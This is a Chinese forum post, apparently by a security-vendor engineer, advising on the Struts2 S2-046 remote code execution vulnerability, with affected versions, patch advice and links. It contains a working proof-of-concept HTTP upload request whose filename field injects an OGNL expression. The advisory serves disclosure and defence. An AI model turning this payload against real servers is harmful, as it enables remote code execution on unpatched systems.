查看: 5141|回复: 2
收起左侧

[瑞星] 瑞星:不到半个月,Struts2再再曝高危漏洞S2-046

[复制链接]
瑞星工程师
发表于 2017-3-21 16:07:19 | 显示全部楼层 |阅读模式
概述
近日,安全研究人员发现著名J2EE框架--Struts2存在远程代码执行的漏洞,Struts2官方已经确认该漏洞(S2-046),CVE编号为:CVE-2017-5638,风险等级为高危漏洞。
漏洞详情
漏洞编号:S2-046
CVE编号:CVE-2017-5638
漏洞类型:远程代码执行
漏洞级别:高危
漏洞风险:黑客通过利用漏洞可以实现远程命令执行。
影响版本:struts2.3.5- struts2.3.31 , struts2.5-struts2.5.10。
漏洞描述:使用Jakarta插件处理文件上传时可能导致远程代码执行漏洞
触发条件: 当攻击者通过Content-Length或者Content-Disposition构造恶意的OGNL内容时可能会造成远程代码执行。
POC代码
POST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 10000000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z
Connection: close
------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
Content-Type: text/plain
Kaboom
------WebKitFormBoundaryAnmUgTEhFhOZpr9z--
修复建议
使用Jakarta文件Multipart用户。
升级至安全版本 Struts 2.3.32 或者 Struts 2.5.10.1
更换同类型解析器,过滤Content-Disposition,Content-Type恶意代码
添加waf规则进行拦截恶意攻击
补丁地址参考文档
https://cwiki.apache.org/confluence/display/WW/S2-046?from=timeline&isappinstalled=0
https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723#
dg1vg4
发表于 2017-3-21 17:12:04 | 显示全部楼层
工程师最近很活跃啊。
瑞星工程师
 楼主| 发表于 2017-3-22 16:32:25 | 显示全部楼层
dg1vg4 发表于 2017-3-21 17:12
工程师最近很活跃啊。

每天潜水看看。。。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-26 20:21 , Processed in 0.121061 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表